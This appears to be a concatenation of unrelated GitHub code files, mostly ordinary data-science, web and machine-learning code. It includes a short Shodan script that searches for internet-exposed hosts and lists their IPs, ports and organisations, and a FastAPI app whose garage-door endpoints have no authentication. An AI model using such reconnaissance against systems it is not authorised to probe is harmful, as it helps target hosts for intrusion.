= curr.reset_index(drop=True)\n    curr = curr.T\n    meal_Sensor = pd.concat([meal_Sensor, curr], ignore_index=True)\n    \n#print(meal_Sensor)\n    \nyval2 = pd.DataFrame()\nyval2['31'] = y_val2 \n\n\n# In[224]:\n\n\n\nmeal_Sensor = meal_Sensor.append(yval2, ignore_index=True, sort=False)\nmeal_Sensor = meal_Sensor.dropna()\n\n\n# In[225]:\n\n\nmeal = meal_Sensor\nmeal.to_csv(\"meal_Data_COPY.csv\")\n\n\n# In[226]:\n\n\ndata_ = pd.read_csv('meal_Data_COPY.csv', sep=',' ,header=None)\n\nY = data_.iloc[:, [31]]\ndata = data_.drop(data_.index[31], axis=1)\nY = Y.iloc[1:]\n\n\n# In[227]:\n\n\nmealVector = pd.DataFrame()\n\n\n# In[228]:\n\n\n#get the max value of the cgm data\nmaxVal = data.max(axis=1)\n#get the min value of the cgm data\nminVal = data.min(axis=1)\n\n#create a feature vec of CGMmax - CGMmin\nfeatureVector_CGM_Meal = maxVal - minVal\n\nmealVector['F1'] = featureVector_CGM_Meal\n\n\n# In[229]:\n\n\nmaxValLoc = data.idxmax(axis=1)\n#feature vec of time for cgm max data\nfeatureVector_CGM_MaxTime_Meal = maxValLoc\nmealVector['F2'] = featureVector_CGM_MaxTime_Meal\n\n\n# In[230]:\n\n\n#tells the time in intervals of 5\ntimeVals = []\nfor x,y in featureVector_CGM_MaxTime_Meal.iteritems():\n    mins = 5 + (5 * y)\n    timeVals.append(mins)\n    \ntimeVals = pd.DataFrame(timeVals)\n    \n\n\n# In[231]:\n\n\n#calc velocity for meal\nvel = []\nfor index, row in maxVal.iteritems():\n    for i, r in timeVals.iteritems():\n        if index == i:\n            velocity = (row/r)\n            vel.append(velocity)\n    \nfeatureVector_Meal_Vel = pd.DataFrame(vel)\nfeatureVector_Meal_Vel = featureVector_Meal_Vel.T\n\nmealVector['F3'] = featureVector_Meal_Vel\n\n\n# In[232]:\n\n\nmealVector['F4'] = Y\nfinal = pd.DataFrame()\n\n\n# In[233]:\n\n\nmax1 = mealVector['F4'].max()\n#print(max1)\n\nmin1 = mealVector['F4'].min()\n#print(min1)\n\n\n# In[234]:\n\n\n\nbins=[0, 20, 40, 60, 80, 100, 120, 140] # 200, 220]\n\nmealVector['bin'] = pd.cut(mealVector['F4'], bins=bins, labels=False)\nmealVectorVals = mealVector.values\n\n\n# In[235]:\n\n\nmealVector = mealVector.fillna(0)\n\n\n# In[254]:\n\n\nX = mealVector.iloc[:, [0,1,2]]\n\nN = X.shape[0]\ns = X\n\nfft = 
np.fft.fft(s)\nfreq = np.fft.fftfreq(len(s))\n\n#print(fft, freq)\n\nfreq = freq.reshape(-1,1)\n\n\nplt.ylabel(\"Amplitude\")\nplt.xlabel(\"Frequency [Hz]\")\nplt.plot(freq,fft)\nplt.show()\n\n\n# In[388]:\n\n\nbins = mealVector.iloc[:, [1, 2, 3]]\nbins = bins.to_numpy()\n\nbins = bins.tolist()\n\nkm = KMeans(\n n_clusters=6, init='random',\n n_init=10, max_iter=300, \n tol=1e-04, random_state=0\n)\n\ny_km = km.fit_predict(freq)\n#print(y_km)\n\ny_km2 = km.fit_predict(bins)\n#print(y_km2)\n\n\n# In[389]:\n\n\nplt.scatter(\n mealVectorVals[y_km == 0, 0], mealVectorVals[y_km == 0, 1],\n s=50, c='lightgreen',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 1, 0], mealVectorVals[y_km == 1, 1],\n s=50, c='orange',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 2, 0], mealVectorVals[y_km == 2, 1],\n s=50, c='lightblue',\n marker='o', edgecolor='black',\n label='cluster 2'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 3, 0], mealVectorVals[y_km == 3, 1],\n s=50, c='pink',\n marker='o', edgecolor='black',\n label='cluster 3'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 4, 0], mealVectorVals[y_km == 4, 1],\n s=50, c='green',\n marker='o', edgecolor='black',\n label='cluster 4'\n)\n\nplt.scatter(\n mealVectorVals[y_km == 5, 0], mealVectorVals[y_km == 5, 1],\n s=50, c='blue',\n marker='o', edgecolor='black',\n label='cluster 5'\n)\n\n\n\n\n\n\n# In[390]:\n\n\nplt.scatter(\n mealVectorVals[y_km2 == 0, 0], mealVectorVals[y_km2 == 0, 1],\n s=50, c='lightgreen',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 1, 0], mealVectorVals[y_km2 == 1, 1],\n s=50, c='orange',\n marker='o', edgecolor='black',\n label='cluster 1'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 2, 0], mealVectorVals[y_km2 == 2, 1],\n s=50, c='lightblue',\n marker='o', edgecolor='black',\n label='cluster 2'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 3, 0], mealVectorVals[y_km2 == 3, 1],\n s=50, c='pink',\n marker='o', edgecolor='black',\n label='cluster 3'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 4, 0], mealVectorVals[y_km2 == 4, 1],\n s=50, c='green',\n marker='o', edgecolor='black',\n label='cluster 4'\n)\n\nplt.scatter(\n mealVectorVals[y_km2 == 5, 0], mealVectorVals[y_km2 == 5, 1],\n s=50, c='blue',\n marker='o', edgecolor='black',\n label='cluster 5'\n)\n\n\n# In[391]:\n\n\ndistortions = []\nfor i in range(1, 11):\n km = KMeans(\n n_clusters=i, init='random',\n n_init=10, max_iter=300,\n tol=1e-04, random_state=0\n )\n km.fit(freq)\n distortions.append(km.inertia_)\n \n\n# plot\nplt.plot(range(1, 11), distortions, marker='o')\nplt.xlabel('Number of clusters')\nplt.ylabel('SSE')\nplt.show()\n\n\n# In[405]:\n\n\n#DBSCAN\nscan = mealVector.iloc[:, [1, 2, 3]]\nscan = scan.to_numpy()\nscan = scan.tolist()\n#print(scan.to_numpy().tolist())\n\n\"\"\"\nN = scan.shape[0]\ns = X\n\nfft2 = np.fft.fft(s)\nfreq2 = np.fft.fftfreq(len(s))\n\n\nfreq2 = freq2.reshape(-1,1)\n\nprint(freq2)\n\"\"\"\nscaler = StandardScaler() \nX_scaled = scaler.fit_transform(scan) \n \n# Normalizing the data so that \n# the data approximately follows a Gaussian distribution \nX_normalized = normalize(X_scaled) \n \n# Converting the numpy array into a pandas DataFrame \nX_normalized = pd.DataFrame(X_normalized) \n\n#X_normalized.values\n\n\n# In[406]:\n\n\npca = PCA(n_components = 2) \nX_principal = pca.fit_transform(X_normalized) \nX_principal = pd.DataFrame(X_principal) \nX_principal.columns = ['P1', 'P2'] 
\n\ndb_default = DBSCAN(eps = 0.0375, min_samples = 3).fit(X_principal) \ny_db = db_default.fit_predict(X_principal)\n#print(y_db)\nlabels = db_default.labels_ \n#print(labels)\n\n\n# In[407]:\n\n\ncolors = {} \ncolors[0] = 'red'\ncolors[1] = 'green'\ncolors[2] = 'blue'\ncolors[3] = 'cyan'\ncolors[4] = 'purple'\ncolors[5] = 'tomato'\ncolors[6] = 'olive'\ncolors[7] = 'blueviolet'\ncolors[8] = 'lightgreen'\ncolors[9] = 'hotpink'\ncolors[10] = 'brown'\ncolors[11] = 'fuchsia'\ncolors[12] = 'gold'\ncolors[13] = 'orange'\ncolors[14] = 'teal'\ncolors[15] = 'deeppink'\ncolors[16] = 'silver'\ncolors[17] = 'thistle'\ncolors[18] = 'chocolate'\ncolors[19] = 'darkorange'\ncolors[20] = 'slateblue'\ncolors[21] = 'dodgerblue'\ncolors[22] = 'yellowgreen'\ncolors[23] = 'sandybrown'\ncolors[24] = 'azure'\ncolors[25] = 'springgreen'\ncolors[26] = 'indigo'\ncolors[27] = 'plum'\ncolors[28] = 'firebrick'\ncolors[29] = 'skyblue'\ncolors[30] = 'violet'\ncolors[31] = 'aquamarine'\ncolors[-1] = 'coral'\n \n# Building the colour vector for each data point \ncvec = [colors[label] for label in labels] \n\nplt.figure(figsize =(9, 9)) \nplt.scatter(X_principal['P1'], X_principal['P2'] , c = cvec) \n \nplt.show() \n \n\n\n# In[408]:\n\n\nplt.figure(figsize=(10,5))\nnn = NearestNeighbors(n_neighbors=5).fit(X_normalized)\ndistances, idx = nn.kneighbors(X_normalized)\ndistances = np.sort(distances, axis=0)\ndistances = distances[:,1]\n\nplt.plot(distances)\nplt.show()\n\n\n#Computing \"the Silhouette Score\"\nprint(\"Silhouette Coefficient: %0.3f\"\n % metrics.silhouette_score(X_principal, labels))\n\n\n\n# In[409]:\n\n\nkm.inertia_\nfinal['KMeans SSE'] = km.inertia_\n#print(final)\n\nsilhoutte = metrics.silhouette_score(X_principal, labels)\nfinal['DBScan Silhoette Score'] = silhoutte\n\n#***********************\nent = entropy(mealVector['bin'], base=2)\nfinal['Kmeans Entropy'] = ent \n\n\nent2 = entropy(mealVector['bin'], base=2)\nfinal['DBScan Entropy'] = ent2\n\n\n\n#***********************\ndef purity_score(y_true, y_pred):\n # compute contingency matrix (also called confusion matrix)\n contingency_matrix = metrics.cluster.contingency_matrix(y_true, y_pred)\n # return purity\n return np.sum(np.amax(contingency_matrix, axis=0)) / np.sum(contingency_matrix) \n\npurity = purity_score(mealVector['bin'], km.labels_)\n#purity = purity_score(y_km, km.labels_)\npur= []\npur.append(purity)\nfinal['Kmeans Purity'] = pur\n\npurity2 = purity_score(mealVector['bin'], db_default.labels_)\npur2 = []\npur2.append(purity2)\nfinal['DBScan Purity'] = pur2\n\n\n# In[410]:\n\n\nrows = [final]\nfile = pd.concat(rows, axis=0)\nfile.to_csv(\"Miller_Assignment03_Results.csv\")\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Jmiller118/Data-Mining","sub_path":"Assignment03/Miller_Assignment03.py","file_name":"Miller_Assignment03.py","file_ext":"py","file_size_in_byte":15620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41070590517","text":"import secrets\n\nfrom django.conf import settings\nfrom django.db import models\n\nfrom .. 
import constants\n\n__all__ = [\n \"TokenMixin\"\n]\n\nTOKEN_MAX_LENGTH = getattr(settings, \"TOKEN_MAX_LENGTH\", constants.DEFAULT_TOKEN_MAX_LENGTH)\nTOKEN_CHARS = getattr(settings, \"TOKEN_CHARS\", constants.DEFAULT_TOKEN_CHARS)\nCREATE_ON_CREATION = getattr(\n settings, \"TOKEN_CREATE_ON_CREATION\", constants.TOKEN_CREATE_ON_CREATION\n)\n\n\nclass TokenMixin(models.Model):\n \"\"\"Create a `token` field with the ability to change it.\"\"\"\n\n class Meta:\n \"\"\"Meta class.\"\"\"\n\n abstract = True\n\n TOKEN_LENGTH = TOKEN_MAX_LENGTH\n TOKEN_CHARS = TOKEN_CHARS\n CREATE_ON_CREATION = CREATE_ON_CREATION\n\n token = models.CharField(\n max_length=TOKEN_MAX_LENGTH\n )\n\n @classmethod\n def _generate_token(cls) -> str:\n \"\"\"Generate a token and return it.\n\n This function just generates a token.\n \"\"\"\n assert cls.TOKEN_LENGTH <= TOKEN_MAX_LENGTH, \\\n f\"`TOKEN_LENGTH` can be at most `{TOKEN_MAX_LENGTH}`\"\n\n return \"\".join(\n secrets.choice(cls.TOKEN_CHARS)\n for _ in range(cls.TOKEN_LENGTH)\n )\n\n def _create_token(self):\n \"\"\"Generate a new token and set it.\"\"\"\n self.token = self._generate_token()\n\n def recreate_token(self):\n \"\"\"Recreates the token and saves it.\"\"\"\n self._create_token()\n self.save()\n\n def save(self, *args, **kwargs):\n \"\"\"Create a token if necessary and allowed.\"\"\"\n if self.token == \"\" and self.CREATE_ON_CREATION:\n self._create_token()\n\n return super().save(*args, **kwargs)\n","repo_name":"Myzel394/django-model-mixins","sub_path":"django_model_mixins/mixins/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38598343218","text":"from graphene import Schema\nfrom fastapi import FastAPI\nfrom starlette_graphene3 import *\nfrom app.db.database import prepare_database, Session\nfrom app.gql.querys import Query\nfrom app.db.models import Employer, Job, JobApplication\nfrom app.gql.mutations import Mutation\n\n\nschema = Schema(query=Query, mutation=Mutation)\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\ndef startup_event():\n prepare_database()\n\n\n@app.get(\"/employers\")\ndef get_employers():\n with Session() as session:\n return session.query(Employer).all()\n\n\n@app.get(\"/apps\")\ndef get_applications():\n with Session() as session:\n return session.query(JobApplication).count()\n\n\n@app.get(\"/jobs\")\ndef get_jobs():\n with Session() as session:\n return session.query(Job).all()\n\n\napp.mount(\"/\", GraphQLApp(\n schema=schema,\n on_get=make_playground_handler()\n))\n","repo_name":"AgustinRomeo/glq-app","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13888541261","text":"import os\nimport torch\nimport logging\nimport numpy as np\nimport torch.nn.functional as F\n\nclass DQN:\n\n def __init__(self,\n network,\n gamma,\n network_lr,\n device):\n\n self.type = \"value\"\n self.network = network.to(device)\n self.device = device\n self.gamma = gamma\n\n self.network_optimiser = torch.optim.Adam(self.network.parameters(), lr=network_lr)\n\n def select_action_from_policy(self, state):\n self.network.eval()\n with torch.no_grad():\n state_tensor = torch.FloatTensor(state).to(self.device)\n state_tensor = state_tensor.unsqueeze(0)\n q_values = self.network(state_tensor)\n action = torch.argmax(q_values).item()\n self.network.train()\n return 
action\n\n def train_policy(self, experiences):\n states, actions, rewards, next_states, dones = experiences\n info = {}\n\n # Convert into tensor\n states = torch.FloatTensor(np.asarray(states)).to(self.device)\n actions = torch.LongTensor(np.asarray(actions)).to(self.device)\n rewards = torch.FloatTensor(np.asarray(rewards)).to(self.device)\n next_states = torch.FloatTensor(np.asarray(next_states)).to(self.device)\n dones = torch.LongTensor(np.asarray(dones)).to(self.device)\n\n # Generate Q Values given state at time t and t + 1\n q_values = self.network(states)\n next_q_values = self.network(next_states)\n\n best_q_values = q_values[torch.arange(q_values.size(0)), actions]\n best_next_q_values = torch.max(next_q_values, dim=1).values\n\n q_target = rewards + self.gamma * (1 - dones) * best_next_q_values\n\n # Update the Network\n loss = F.mse_loss(best_q_values, q_target)\n self.network_optimiser.zero_grad()\n loss.backward()\n self.network_optimiser.step()\n\n info['q_target'] = q_target\n info['q_values_min'] = best_q_values\n info['network_loss'] = loss\n \n return info\n\n def save_models(self, filename, filepath='models'):\n path = f\"{filepath}/models\" if filepath != 'models' else filepath\n dir_exists = os.path.exists(path)\n\n if not dir_exists:\n os.makedirs(path)\n\n torch.save(self.network.state_dict(), f'{path}/{filename}_network.pht')\n logging.info(\"models has been saved...\")\n\n def load_models(self, filepath, filename):\n path = f\"{filepath}/models\" if filepath != 'models' else filepath\n\n self.network.load_state_dict(torch.load(f'{path}/{filename}_network.pht'))\n logging.info(\"models has been loaded...\")\n","repo_name":"UoA-CARES/cares_reinforcement_learning","sub_path":"cares_reinforcement_learning/algorithm/value/DQN.py","file_name":"DQN.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"70093230247","text":"\"\"\"!\nTests our graph search algorithms\n\"\"\"\nimport cProfile\nimport unittest\n\n# profiler related\nfrom pstats import Stats\n\nfrom pygmodels.gtype.basegraph import BaseGraph\nfrom pygmodels.graphf.bgraphops import BaseGraphOps\nfrom pygmodels.gtype.edge import Edge, EdgeType\nfrom pygmodels.gtype.node import Node\nfrom pygmodels.graphf.graphsearcher import BaseGraphSearcher\n\n\nclass BaseGraphSearcherTests(unittest.TestCase):\n \"\"\"\"\"\"\n\n def setUp(self):\n self.verbose = False\n #\n # Alan Gibbons, Algorithmic graph theory 1985, p. 22, fig. 
1.16\n # depth first undirected graph\n\n # nodes\n self.n1 = Node(\"n1\", data={})\n self.n2 = Node(\"n2\", data={})\n self.n3 = Node(\"n3\", data={})\n self.n4 = Node(\"n4\", data={})\n self.n5 = Node(\"n5\", data={})\n self.n6 = Node(\"n6\", data={})\n self.n7 = Node(\"n7\", data={})\n self.n8 = Node(\"n8\", data={})\n self.n9 = Node(\"n9\", data={})\n self.n10 = Node(\"n10\", data={})\n self.n11 = Node(\"n11\", data={})\n self.n12 = Node(\"n12\", data={})\n self.n13 = Node(\"n13\", data={})\n\n # edges\n self.e1u = Edge.undirected(\n \"n1n4\", start_node=self.n1, end_node=self.n4, data={}\n )\n self.e2u = Edge.undirected(\n \"n1n3\", start_node=self.n1, end_node=self.n3, data={}\n )\n self.e3u = Edge.undirected(\n \"n1n2\", start_node=self.n1, end_node=self.n2, data={}\n )\n self.e4u = Edge.undirected(\n \"n1n5\", start_node=self.n1, end_node=self.n5, data={}\n )\n self.e5u = Edge.undirected(\n \"n1n6\", start_node=self.n1, end_node=self.n6, data={}\n )\n self.e6u = Edge.undirected(\n \"n1n7\", start_node=self.n1, end_node=self.n7, data={}\n )\n self.e7u = Edge.undirected(\n \"n1n8\", start_node=self.n1, end_node=self.n8, data={}\n )\n self.e8u = Edge.undirected(\n \"n8n2\", start_node=self.n8, end_node=self.n2, data={}\n )\n self.e9u = Edge.undirected(\n \"n9n10\", start_node=self.n9, end_node=self.n10, data={}\n )\n self.e10u = Edge.undirected(\n \"n9n13\", start_node=self.n9, end_node=self.n13, data={}\n )\n self.e11u = Edge.undirected(\n \"n10n11\", start_node=self.n10, end_node=self.n11, data={}\n )\n self.e12u = Edge.undirected(\n \"n10n12\", start_node=self.n10, end_node=self.n12, data={}\n )\n self.ugraph = BaseGraph(\n \"ugraph\",\n nodes=set(\n [\n self.n1,\n self.n2,\n self.n3,\n self.n4,\n self.n5,\n self.n6,\n self.n7,\n self.n8,\n self.n9,\n self.n10,\n self.n11,\n self.n12,\n self.n13,\n ]\n ),\n edges=set(\n [\n self.e1u,\n self.e2u,\n self.e3u,\n self.e4u,\n self.e5u,\n self.e6u,\n self.e7u,\n self.e8u,\n self.e9u,\n self.e10u,\n self.e11u,\n self.e12u,\n ]\n ),\n data={},\n )\n\n # tree\n self.a = Node(\"a\")\n self.b = Node(\"b\")\n self.c = Node(\"c\")\n self.d = Node(\"d\")\n self.e = Node(\"e\")\n self.f = Node(\"f\")\n self.g = Node(\"g\")\n self.h = Node(\"h\")\n self.j = Node(\"j\")\n self.k = Node(\"k\")\n self.m = Node(\"m\")\n #\n # +--a --+\n # | |\n # b c\n # | \\\n # +--+--+ g\n # | | | |\n # d e f h -- j\n # |\n # +--+---+\n # | |\n # k m\n #\n #\n self.ab = Edge(edge_id=\"ab\", start_node=self.a, end_node=self.b)\n self.ac = Edge(edge_id=\"ac\", start_node=self.a, end_node=self.c)\n self.bd = Edge(edge_id=\"bd\", start_node=self.b, end_node=self.d)\n self.be = Edge(edge_id=\"be\", start_node=self.b, end_node=self.e)\n self.bf = Edge(edge_id=\"bf\", start_node=self.b, end_node=self.f)\n self.fk = Edge(edge_id=\"fk\", start_node=self.f, end_node=self.k)\n self.fm = Edge(edge_id=\"fm\", start_node=self.f, end_node=self.m)\n self.cg = Edge(edge_id=\"cg\", start_node=self.c, end_node=self.g)\n self.gh = Edge(edge_id=\"gh\", start_node=self.g, end_node=self.h)\n self.hj = Edge(edge_id=\"hj\", start_node=self.h, end_node=self.j)\n self.gtree = BaseGraph.from_edgeset(\n edges=set(\n [\n self.ab,\n self.ac,\n self.bd,\n self.be,\n self.bf,\n self.fk,\n self.fm,\n self.cg,\n self.gh,\n self.hj,\n ]\n ),\n )\n\n # initialize profiler\n self.prof = cProfile.Profile()\n self.prof.enable()\n # print(\"\\n<<<<--------\")\n\n def tearDown(self):\n \"\"\" \"\"\"\n p = Stats(self.prof)\n p.sort_stats(\"cumtime\")\n if self.verbose is True:\n 
p.dump_stats(\"profiles/test_graphsearcher.py.prof\")\n            p.print_stats()\n        p.strip_dirs()\n        # p.print_stats()\n        # print(\"\\n--------->>>\")\n\n    def test_id(self):\n        return self.assertEqual(self.ugraph.id(), \"ugraph\")\n\n    @unittest.skip(\"Implementation is not finished yet\")\n    def test_depth_first_search(self):\n        \"\"\n\n        def egen(node):\n            return BaseGraphOps.edges_of(self.ugraph, node)\n\n        result = BaseGraphSearcher.depth_first_search(\n            g=self.ugraph, edge_generator=egen\n        )\n        self.assertEqual(2, result[\"nb-component\"])\n        # test leaves\n        preds = result[\"dfs-trees\"]\n        comps = []\n        for root, c in preds.items():\n            cd = {}\n            for key, val in c.items():\n                if val is not None:\n                    cd[key] = val\n            comps.append(cd)\n        # print(comps)\n        first = comps.pop(0)\n\n    def test_uniform_cost_search(self):\n        \"\"\"\"\"\"\n        start_node = self.b\n        goal_node = self.m\n        problem_set = self.gtree.E\n        elist, solution = BaseGraphSearcher.uniform_cost_search(\n            g=self.gtree, goal=goal_node, start=start_node, problem_set=problem_set\n        )\n        edges = [solution[\"edge\"]]\n        while solution[\"parent\"] is not None:\n            solution = solution[\"parent\"]\n            edges.append(solution[\"edge\"])\n        edges.pop()  # last element edge is None\n        self.assertEqual(list(reversed(edges)), [self.bf, self.fm])\n","repo_name":"D-K-E/graphical-models","sub_path":"test/test_graphsearcher.py","file_name":"test_graphsearcher.py","file_ext":"py","file_size_in_byte":7013,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
{"seq_id":"2762160572","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ### Importing Libraries\n\n# In[17]:\n\n\nimport pandas as pd\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport matplotlib.pyplot as plt\n\n\n# #### Creating groupings\n\n# In[5]:\n\n\ndados = pd.read_csv('dados/aluguel_residencial.csv', sep = ';')\ndados\n\n\n# In[6]:\n\n\ndados['Valor'].mean()\n\n\n# In[7]:\n\n\nbairros = ['Barra da Tijuca', 'Copacabana', 'Ipanema', 'Leblon', 'Botafogo', 'Flamengo', 'Tijuca'] #opened a dataframe to take the mean by neighborhood\nselecao = dados['Bairro'].isin(bairros)\ndados = dados[selecao]\n\n\n# In[9]:\n\n\ndados['Bairro'].drop_duplicates() #ok all neighborhoods combined\n\n\n# In[11]:\n\n\ngrupo_bairro = dados.groupby('Bairro')\ngrupo_bairro\n\n\n# In[14]:\n\n\ngrupo_bairro[['Valor', 'Condominio']].mean().round(2) #mean of neighborhoods, condo fees and rent values\n\n\n# ### Descriptive statistics\n\n# In[16]:\n\n\ngrupo_bairro['Valor'].describe().round(2) #some interesting metrics \n\n\n# In[19]:\n\n\nplt.rc('figure', figsize = (20,10))\nfig = grupo_bairro['Valor'].std().plot.bar(color = 'blue')\n\n\n# In[20]:\n\n\nfig = grupo_bairro['Valor'].mean().plot.bar(color = 'blue')\nfig.set_ylabel('Rent Value')\nfig.set_title('Average Rent Value by Neighborhood', {'fontsize': 22})\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n","repo_name":"PatriciaSousas/Python-Pandas-Tratamento-e-analise-de-dados","sub_path":"Relatórios de Análise VII.py","file_name":"Relatórios de Análise VII.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"11897752915","text":"import uvicorn\nfrom fastapi import FastAPI\nfrom fastapi_utils.tasks import 
repeat_every\n\nfrom lib.garage_doors import trigger_right_garage_door, trigger_left_garage_door\nfrom lib.camera import detect_cars\n\napp = FastAPI()\n\n\n@app.get(\"/alive\")\nasync def _alive():\n return \"Hi\"\n\n\n@app.get(\"/door/right\", status_code=200)\nasync def _trigger_door():\n trigger_right_garage_door()\n return \"Right door triggered\"\n\n\n@app.get(\"/door/left\", status_code=200)\nasync def _trigger_door():\n trigger_left_garage_door()\n return \"Left door triggered\"\n\n\n@app.get(\"/camera/capture\", status_code=200)\n@app.on_event(\"startup\")\n@repeat_every(seconds=2)\nasync def _capture_image():\n detect_cars()\n return \"Captured new image\"\n\n\nif __name__ == \"__main__\":\n uvicorn.run(\"app:app\", port=5000, host=\"0.0.0.0\")\n","repo_name":"jantoreh/garagepi","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"324611646","text":"from lib import FreqTableSimple\n\ntabla1 = FreqTableSimple([\n 'A', 'A', 'A', 'B', 'B',\n 'B', 'B', 'B', 'B', 'C'\n])\ntabla2 = FreqTableSimple({\n 'A':3, 'B':6, 'C':1\n})\ntabla3 = FreqTableSimple(\n 'A', 'A', 'A', 'B', 'B',\n 'B', 'B', 'B', 'B', 'C'\n)\ntabla4 = FreqTableSimple(\n A = 3, B = 6, C = 1\n)\n\nprint(tabla1)","repo_name":"xeland314/freqtables","sub_path":"examples/example0.py","file_name":"example0.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"tr","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"3218500195","text":"import initial_etl.character_etl as character_etl\nimport initial_etl.weapon_etl as weapon_etl\nimport initial_etl.artifact_etl as artifact_etl\n\nclass Updater:\n \"\"\" Class to update/ETL all objects \"\"\"\n def __init__(self,char_url,weapon_urls,artifact_url):\n self._char_url = char_url\n self._weapon_urls = weapon_urls\n self._artifact_url = artifact_url\n \n def update(self):\n #Updates data on characters\n char_updater = character_etl.CharacterETL(self._char_url)\n char_updater.etl_data()\n\n #Updates data on weapons\n for weapon in self._weapon_urls:\n weapon_updater = weapon_etl.WeaponETL(self._weapon_urls[weapon], weapon)\n weapon_updater.etl_data()\n \n #Updates data on artifacts\n artifact_updater = artifact_etl.ArtifactETL(self._artifact_url)\n artifact_updater.etl_data()\n\n\n","repo_name":"blank519/genshin-char-builder","sub_path":"initial_etl/update_objects.py","file_name":"update_objects.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21645094454","text":"\n\nimport shodan\n\na = shodan.Shodan(\"Your API Key\")\nwhile True:\n print(\n \"\"\"\n 1. get your ip\n 2. Shodan Search to scan IPs, Hostnames, ports\n 3. Scanning a specific Host\n 0. quit\n \"\"\"\n )\n x = int(input(\"your option : \"))\n if x == 2:\n s = input(\"what would you like to search ? 
\")\n        results = a.search(s)\n        for result in results['matches']:\n            print( result[\"ip_str\"],\"\\t\",end = '')\n            print(str(result[\"port\"]),\"\\t\",end = '')\n            print( result[\"org\"],\"\\t\",end = '')\n            print(result[\"location\"][\"country_name\"],\"\\t\",end = '')\n            print()\n        print()\n    if x == 3:\n        k = input(\"enter an ip addrs : \")\n        ipinfo = a.host(k)\n        print(\"host name:\",\" \"*8,ipinfo['hostnames'],\"\\n\",\n              \"city :\",\" \"*11,ipinfo[\"city\"], \"\\n\",\n              \"country :\",\" \"*8,ipinfo[\"country_name\"],\"\\n\",\n              \"organization :\",\" \"*3,ipinfo[\"org\"], \"\\n\",\n              \"port :\",\" \"*11,ipinfo['data'][0]['port'],\"\\n\"\n              )\n    if x ==1:\n        print(a.tools.myip())\n    if x == 0:\n        break\n","repo_name":"sashreek1/shodan_scan","sub_path":"shodan_scanner.py","file_name":"shodan_scanner.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"11713988302","text":"import inspect\n\nimport h5py\nimport numpy as np\nimport pandas as pd\n\nfrom mt_metadata import timeseries as metadata\nfrom mt_metadata.utils.mttime import MTime\n\nfrom mth5.groups import (\n    BaseGroup,\n    RunGroup,\n    TransferFunctionsGroup,\n    MasterFCGroup,\n)\nfrom mth5.helpers import from_numpy_type\nfrom mth5.utils.exceptions import MTH5Error\n\nmeta_classes = dict(inspect.getmembers(metadata, inspect.isclass))\n# =============================================================================\n# Standards Group\n# =============================================================================\n\n\nclass MasterStationGroup(BaseGroup):\n    \"\"\"\n    Utility class to hold information about the stations within a survey and\n    accompanying metadata. This class is next level down from Survey for\n    stations ``/Survey/Stations``. This class provides methods to add and\n    get stations. A summary table of all existing stations is also provided\n    as a convenience look up table to make searching easier.\n\n    To access MasterStationGroup from an open MTH5 file:\n\n    >>> from mth5 import mth5\n    >>> mth5_obj = mth5.MTH5()\n    >>> mth5_obj.open_mth5(r\"/test.mth5\", mode='a')\n    >>> stations = mth5_obj.stations_group\n\n    To check what stations exist\n\n    >>> stations.groups_list\n    ['summary', 'MT001', 'MT002', 'MT003']\n\n    To access the hdf5 group directly use `SurveyGroup.hdf5_group`.\n\n    >>> stations.hdf5_group.ref\n    <HDF5 Group Reference>\n\n    .. note:: All attributes should be input into the metadata object, that\n              way all input will be validated against the metadata standards.\n              If you change attributes in metadata object, you should run the\n              `SurveyGroup.write_metadata()` method. This is a temporary\n              solution, working on an automatic updater if metadata is changed.\n\n    >>> stations.metadata.existing_attribute = 'update_existing_attribute'\n    >>> stations.write_metadata()\n\n    If you want to add a new attribute this should be done using the\n    `metadata.add_base_attribute` method.\n\n    >>> stations.metadata.add_base_attribute('new_attribute',\n    >>> ... 'new_attribute_value',\n    >>> ... {'type':str,\n    >>> ... 'required':True,\n    >>> ... 'style':'free form',\n    >>> ... 'description': 'new attribute desc.',\n    >>> ... 